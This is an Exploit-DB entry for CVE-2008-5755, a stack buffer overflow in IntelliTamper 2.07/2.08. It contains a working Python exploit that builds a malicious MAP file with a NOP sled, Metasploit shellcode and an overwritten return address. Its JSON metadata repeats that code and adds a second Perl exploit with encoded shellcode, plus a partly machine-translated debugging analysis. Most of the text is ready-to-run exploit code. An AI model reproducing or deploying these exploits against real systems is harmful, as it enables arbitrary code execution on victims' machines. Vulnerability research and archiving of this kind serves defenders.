IntelliTamper 2.07/2.08 - MAP File Local SEH Overwrite Exploit
2008-12-28T00:00:00
ID EDB-ID:7582 Type exploitdb Reporter Cnaph Modified 2008-12-28T00:00:00
Description
IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit. CVE-2008-5755. Local exploit for windows platform
#!/usr/bin/python
# IntelliTamper 2.07/2.08 (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux <cN4phux@gmail.com>
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . .
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,
#Here's the the Poc :
import sys
map_theader = ((("\x23\x23\x23\x20\x53\x49\x54\x45\x4D"
"\x41\x50\x31\x20\x49\x4E\x54\x45\x4C"
"\x4C\x49\x54\x41\x4D\x50\x45\x52\x0D\x0A"))) #junk
map_iheader = "\x46\x49\x4C\x45\x23\x23"
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = ((("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
"\x91\xc1\x60\x83\xeb\xfc\xe2\xf4\x39\x79\x85\x60\xc5\x91\x4a\x25"
"\xf9\x1a\xbd\x65\xbd\x90\x2e\xeb\x8a\x89\x4a\x3f\xe5\x90\x2a\x29"
"\x4e\xa5\x4a\x61\x2b\xa0\x01\xf9\x69\x15\x01\x14\xc2\x50\x0b\x6d"
"\xc4\x53\x2a\x94\xfe\xc5\xe5\x64\xb0\x74\x4a\x3f\xe1\x90\x2a\x06"
"\x4e\x9d\x8a\xeb\x9a\x8d\xc0\x8b\x4e\x8d\x4a\x61\x2e\x18\x9d\x44"
"\xc1\x52\xf0\xa0\xa1\x1a\x81\x50\x40\x51\xb9\x6c\x4e\xd1\xcd\xeb"
"\xb5\x8d\x6c\xeb\xad\x99\x2a\x69\x4e\x11\x71\x60\xc5\x91\x4a\x08"
"\xf9\xce\xf0\x96\xa5\xc7\x48\x98\x46\x51\xba\x30\xad\x61\x4b\x64"
"\x9a\xf9\x59\x9e\x4f\x9f\x96\x9f\x22\xf2\xa0\x0c\xa6\x91\xc1\x60"))); # 160 byte
header_nop = "\x90"*327
retn = "\x7b\x34\x12\x00"+".html\n" # EIP value with 4 byte fix
exploit = map_theader + map_iheader + header_nop + shellcode + retn
headers = open("0x.map", "w")
headers.write(exploit)
headers.close()
print "\nFile created successfully !";
print "\n\cN4phux.";
# milw0rm.com [2008-12-28]
{"id": "EDB-ID:7582", "hash": "68d587ec641a998f606f0c8d99f8c9ae", "type": "exploitdb", "bulletinFamily": "exploit", "title": "IntelliTamper 2.07/2.08 - MAP File Local SEH Overwrite Exploit", "description": "IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit. CVE-2008-5755. Local exploit for windows platform", "published": "2008-12-28T00:00:00", "modified": "2008-12-28T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/7582/", "reporter": "Cnaph", "references": [], "cvelist": ["CVE-2008-5755"], "lastseen": "2016-02-01T03:32:31", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-02-01T03:32:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5755"]}, {"type": "exploitdb", "idList": ["EDB-ID:6106"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783727"]}], "modified": "2016-02-01T03:32:31"}, "vulnersScore": 7.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7582/", "sourceData": "#!/usr/bin/python\r\n# IntelliTamper 2.07/2.08 (MAP File) 0-day Local SEH Overwrite Exploit\r\n# Bug discovered by cN4phux <cN4phux@gmail.com>\r\n# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR\r\n# Shellcode: Windows Execute Command (calc) <metasploit.com>\r\n# Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . .\r\n# EAX 0015B488 ECX 00123400 EDX 00123610\r\n# EBX 00000000 ESP 00123604 EBP 00128B78\r\n# ESI 00000000 EDI 00123A64 EIP 41414141\r\n#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,\r\n#Here's the the Poc :\r\n\r\n\r\nimport sys\r\nmap_theader = (((\"\\x23\\x23\\x23\\x20\\x53\\x49\\x54\\x45\\x4D\"\r\n \"\\x41\\x50\\x31\\x20\\x49\\x4E\\x54\\x45\\x4C\"\r\n \"\\x4C\\x49\\x54\\x41\\x4D\\x50\\x45\\x52\\x0D\\x0A\"))) #junk\r\n\r\nmap_iheader = \"\\x46\\x49\\x4C\\x45\\x23\\x23\"\r\n\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\r\nshellcode = (((\"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xc5\"\r\n \"\\x91\\xc1\\x60\\x83\\xeb\\xfc\\xe2\\xf4\\x39\\x79\\x85\\x60\\xc5\\x91\\x4a\\x25\"\r\n \"\\xf9\\x1a\\xbd\\x65\\xbd\\x90\\x2e\\xeb\\x8a\\x89\\x4a\\x3f\\xe5\\x90\\x2a\\x29\"\r\n \"\\x4e\\xa5\\x4a\\x61\\x2b\\xa0\\x01\\xf9\\x69\\x15\\x01\\x14\\xc2\\x50\\x0b\\x6d\"\r\n \"\\xc4\\x53\\x2a\\x94\\xfe\\xc5\\xe5\\x64\\xb0\\x74\\x4a\\x3f\\xe1\\x90\\x2a\\x06\"\r\n \"\\x4e\\x9d\\x8a\\xeb\\x9a\\x8d\\xc0\\x8b\\x4e\\x8d\\x4a\\x61\\x2e\\x18\\x9d\\x44\"\r\n \"\\xc1\\x52\\xf0\\xa0\\xa1\\x1a\\x81\\x50\\x40\\x51\\xb9\\x6c\\x4e\\xd1\\xcd\\xeb\"\r\n \"\\xb5\\x8d\\x6c\\xeb\\xad\\x99\\x2a\\x69\\x4e\\x11\\x71\\x60\\xc5\\x91\\x4a\\x08\"\r\n \"\\xf9\\xce\\xf0\\x96\\xa5\\xc7\\x48\\x98\\x46\\x51\\xba\\x30\\xad\\x61\\x4b\\x64\"\r\n \"\\x9a\\xf9\\x59\\x9e\\x4f\\x9f\\x96\\x9f\\x22\\xf2\\xa0\\x0c\\xa6\\x91\\xc1\\x60\"))); # 160 byte\r\n\r\nheader_nop = \"\\x90\"*327\r\n\r\nretn = \"\\x7b\\x34\\x12\\x00\"+\".html\\n\" # EIP value with 4 byte fix\r\n\r\nexploit = map_theader + map_iheader + header_nop + shellcode + retn\r\nheaders = open(\"0x.map\", \"w\")\r\nheaders.write(exploit)\r\nheaders.close()\r\n\r\nprint \"\\nFile created successfully !\";\r\nprint \"\\n\\cN4phux.\";\r\n\r\n# milw0rm.com [2008-12-28]\r\n", "osvdbidlist": ["51321"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:29", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in IntelliTamper 2.07 and 2.08 allows remote attackers to execute arbitrary code via a MAP file containing a long URL, possibly a related issue to CVE-2006-2494.", "modified": "2017-09-29T01:32:00", "id": "CVE-2008-5755", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5755", "published": "2008-12-30T17:30:00", "title": "CVE-2008-5755", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T23:13:31", "bulletinFamily": "exploit", "description": "IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl). CVE-2008-5755. Local exploit for windows platform", "modified": "2008-07-21T00:00:00", "published": "2008-07-21T00:00:00", "id": "EDB-ID:6106", "href": "https://www.exploit-db.com/exploits/6106/", "type": "exploitdb", "title": "IntelliTamper 2.07 - map file Local Arbitrary Code Execution Exploit pl", "sourceData": "#!/usr/bin/perl\r\n# k`sOSe - 7/21/2008\r\n# http://secunia.com/advisories/20172\r\n# A sploit for an ancient vuln. Just because i need \r\n# to improve my skills on windows explotation.\r\n\r\nuse warnings;\r\nuse strict;\r\n\r\n# CMD=\"c:\\windows\\system32\\calc.exe\"\r\n# [*] x86/alpha_mixed succeeded, final size 345\r\n# bad char -> \\x89\r\n\r\nmy $shellcode = \r\n\"\\x54\\x5a\\xda\\xd0\\xd9\\x72\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" .\r\n\"\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\" .\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\" .\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\" .\r\n\"\\x4c\\x4a\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\" .\r\n\"\\x47\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x44\\x38\\x45\\x51\\x4a\\x4f\\x4c\" .\r\n\"\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x43\\x31\\x4a\\x4b\" .\r\n\"\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x46\\x51\\x49\" .\r\n\"\\x50\\x4a\\x39\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x44\\x34\\x43\\x37\\x49\\x51\" .\r\n\"\\x49\\x5a\\x44\\x4d\\x43\\x31\\x48\\x42\\x4a\\x4b\\x4c\\x34\\x47\\x4b\\x50\" .\r\n\"\\x54\\x51\\x34\\x44\\x44\\x42\\x55\\x4a\\x45\\x4c\\x4b\\x51\\x4f\\x46\\x44\" .\r\n\"\\x43\\x31\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x51\" . \r\n\"\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b\\x45\\x4c\\x4c\\x4b\\x43\\x31\" .\r\n\"\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44\\x45\\x54\\x48\\x43\\x51\\x4f\\x46\" .\r\n\"\\x51\\x4c\\x36\\x43\\x50\\x51\\x46\\x43\\x54\\x4c\\x4b\\x50\\x46\\x50\\x30\" .\r\n\"\\x4c\\x4b\\x47\\x30\\x44\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\" .\r\n\"\\x4b\\x42\\x48\\x44\\x48\\x4c\\x49\\x4b\\x48\\x4d\\x53\\x49\\x50\\x42\\x4a\" .\r\n\"\\x46\\x30\\x45\\x38\\x4a\\x50\\x4d\\x5a\\x45\\x54\\x51\\x4f\\x45\\x38\\x4a\" .\r\n\"\\x38\\x4b\\x4e\\x4c\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4d\\x37\\x45\\x33\" .\r\n\"\\x47\\x4a\\x51\\x4c\\x42\\x57\\x43\\x59\\x42\\x4e\\x43\\x54\\x42\\x4f\\x44\" .\r\n\"\\x37\\x42\\x53\\x51\\x4c\\x44\\x33\\x44\\x39\\x44\\x33\\x44\\x34\\x43\\x55\" . \r\n\"\\x42\\x4d\\x46\\x53\\x47\\x42\\x51\\x4c\\x43\\x53\\x43\\x51\\x42\\x4c\\x45\" .\r\n\"\\x33\\x46\\x4e\\x42\\x45\\x43\\x48\\x43\\x55\\x45\\x50\\x45\\x5a\\x41\\x41\";\r\n\r\nprint\t\"### SITEMAP1 INTELLITAMPER\\n\"\t.\r\n\t\"\\x41\\x41\" \t\t\t\t.\r\n\t\"\\xeb\\x20\"\t\t\t. # jump ahead\r\n\t\"FOLDER##\"\t\t\t.\r\n\t\"\\x41\" x 24\t\t\t.\r\n\t$shellcode\t\t\t.\r\n\t\"E\" x 108\t\t\t.\r\n\t\"\\x59\\x51\\x3d\\x7e\"\t\t. # ASCII friendly 'call EDI'\r\n\t\"AAAA\\n\";\r\n\r\n# milw0rm.com [2008-07-21]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6106/"}], "myhack58": [{"lastseen": "2017-02-25T09:00:50", "bulletinFamily": "info", "description": "Author: k0shl reprint please indicate the source: http://whereisk0shl.top\n\n### Vulnerability description\n\nSoftware download:\n\nhttps://www.exploit-db.com/apps/91891f4b53d5e61e66061454ab87ccc7-intellitamper_v2.07.exe\n\nPoC:\n\n\nimport sys\nmap_theader = (((\"\\x23\\x23\\x23\\x20\\x53\\x49\\x54\\x45\\x4D\"\n\"\\x41\\x50\\x31\\x20\\x49\\x4E\\x54\\x45\\x4C\"\n\"\\x4C\\x49\\x54\\x41\\x4D\\x50\\x45\\x52\\x0D\\x0A\"))) #junk\n\nmap_iheader = \"\\x46\\x49\\x4C\\x45\\x23\\x23\"\n\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\nshellcode = (((\"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xc5\"\n\"\\x91\\xc1\\x60\\x83\\xeb\\xfc\\xe2\\xf4\\x39\\x79\\x85\\x60\\xc5\\x91\\x4a\\x25\"\n\"\\xf9\\x1a\\xbd\\x65\\xbd\\x90\\x2e\\xeb\\x8a\\x89\\x4a\\x3f\\xe5\\x90\\x2a\\x29\"\n\"\\x4e\\xa5\\x4a\\x61\\x2b\\xa0\\x01\\xf9\\69\\x15\\x01\\x14\\xc2\\x50\\x0b\\x6d\"\n\"\\xc4\\x53\\x2a\\x94\\xfe\\xc5\\xe5\\x64\\xb0\\x74\\x4a\\x3f\\xe1\\x90\\x2a\\x06\"\n\"\\x4e\\x9d\\x8a\\xeb\\x9a\\x8d\\xc0\\x8b\\x4e\\x8d\\x4a\\x61\\x2e\\x18\\x9d\\x44\"\n\"\\xc1\\x52\\xf0\\xa0\\xa1\\x1a\\x81\\x50\\x40\\x51\\xb9\\x6c\\x4e\\xd1\\xcd\\xeb\"\n\"\\xb5\\x8d\\x6c\\xeb\\xad\\x99\\x2a\\69\\x4e\\x11\\x71\\x60\\xc5\\x91\\x4a\\x08\"\n\"\\xf9\\xce\\xf0\\x96\\xa5\\xc7\\x48\\x98\\x46\\x51\\xba\\x30\\xad\\x61\\x4b\\x64\"\n\"\\x9a\\xf9\\x59\\x9e\\x4f\\x9f\\x96\\x9f\\x22\\xf2\\xa0\\x0c\\xa6\\x91\\xc1\\x60\"))); # 160 byte\n\nheader_nop = \"\\x90\"*327\n\nretn = \"\\x7b\\x34\\x12\\x00\"+\". html\\n\" # EIP value with 4 byte fix\n\nexploit = map_theader + map_iheader + header_nop + shellcode + retn\nheaders = open(\"0x. map\", \"w\")\nheaders. write(exploit)\nheaders. close()\n\nprint \"\\nFile created successfully !\";\nprint \"\\n\\cN4phux.\";\n\nTest environment:\n\nwindows xp sp3\n\nThe generated. map files need to follow a certain format, wherein the shellcode portion can be changed to deformity of the string\\x41, generate the map file directly with IntelliTamper is open, you can trigger the vulnerability.\n\n### Vulnerability reproducing and positioning\n\nThis vulnerability is due to IntelliTamper in reading. map files, due to file improper handling, resulting in a function call when a long string is passed, causing the return address is overwritten, resulting in a buffer overflow. The following of this vulnerability for detailed analysis.\n\nFirst constructed poc . map file, with IntelliTamper open, read. the map File, the program crashes, attach Windbg, to reach the vulnerability site.\n\n\n(198.238): Access violation - code c0000005 (!!! second chance !!!)\neax=00176d68 ebx=00000000 ecx=00123400 edx=0012367d esi=00000000 edi=00123a64\neip=41414141 esp=00123604 ebp=00128b78 iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\n41414141?? ???\n\nBy kb backtracking stack calls.\n\n\n0:000> kb\nChildEBP RetAddr Args to Child \nWARNING: Frame IP not in any known module. Following frames may be wrong.\n00123600 41414141 41414141 41414141 41414141 0x41414141\n00128b78 00000000 00000000 00000000 00000000 0x41414141\n\nYou can see this when the stack has been completely destroyed, we need to backtrack to the vulnerability trigger in front of the case, before we can look at the stack.\n\n\n0:000> dc esp l100\n00123604 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00123614 41414141 23232341 64644120 656c6946 AAAAA### AddFile\n00123624 3a202928 6c694620 31232065 41415b20 () : File #1 [AA\n00123634 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00123644 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00123654 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00123664 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00123674 205d4141 65646461 41002e64 41414141 AA] added..AAAAA\n00123684 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n00123694 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\n\nSo we use the OD to locate some of the key functions used in the File Open nowadays breakpoint. With OD open, view inter-module call, in the file to read, for sure there will be some file operations, so that we find a key to the function ReadFile that.\n\n\nFind the Inter-module call, entry 5\nAddress=004017F7\nDisassembly=call dword ptr ds:[<&KERNEL32. ReadFile>]\nTarget file=kernel32. ReadFile\n\nIn procedural airspace, all call Readfile lower breakpoint.\n\nAfter the F9 to run, open the PoC file, and the successful disruption in a Call to ReadFile at the\n\nContinue to F9, to reach the vulnerability in the scene, can be determined in Before this breaking point is read. map file operations, next we'll from this point cut the beginning of the gradual reduction of the vulnerability site.\n\n## Vulnerability analysis\n\nFirst of all, we still use Windbg for analysis, prior to positioning to the ReadFile lower breakpoint.\n\n\nBreakpoint 0 hit\neax=00123650 ebx=00128b78 ecx=7c9301bb edx=00000282 esi=00000282 edi=00000110\neip=00412ed4 esp=0012360c ebp=001734c0 iopl=0 nv up ei pl nz ac po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212\nintellitamper+0x12ed4:\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\kernel32.dll - \n00412ed4 ff1540e04100 call dword ptr [intellitamper+0x1e040 (0041e040)] ds:0023:0041e040={kernel32! ReadFile (7c801812)}\n\nAfter the interrupt, single-step follow-up, found the program enters a loop.\n\nThis cycle is a ReadFile after a cycle assignment operation, where the follow up, I found the cycle of a disposition.\n\n\n. text:00413449 not ecx\n. text:0041344B dec ecx\n. text:0041344C cmp edx, ecx\n. text:0041344E jnz loc_413824\n\n**[1] [[2]](<83727_2.htm>) [[3]](<83727_3.htm>) [next](<83727_2.htm>)**", "modified": "2017-02-25T00:00:00", "published": "2017-02-25T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83727.htm", "id": "MYHACK58:62201783727", "type": "myhack58", "title": "INTELLITAMPER . map code execution vulnerability, CVE-2008-5755-a vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}]}
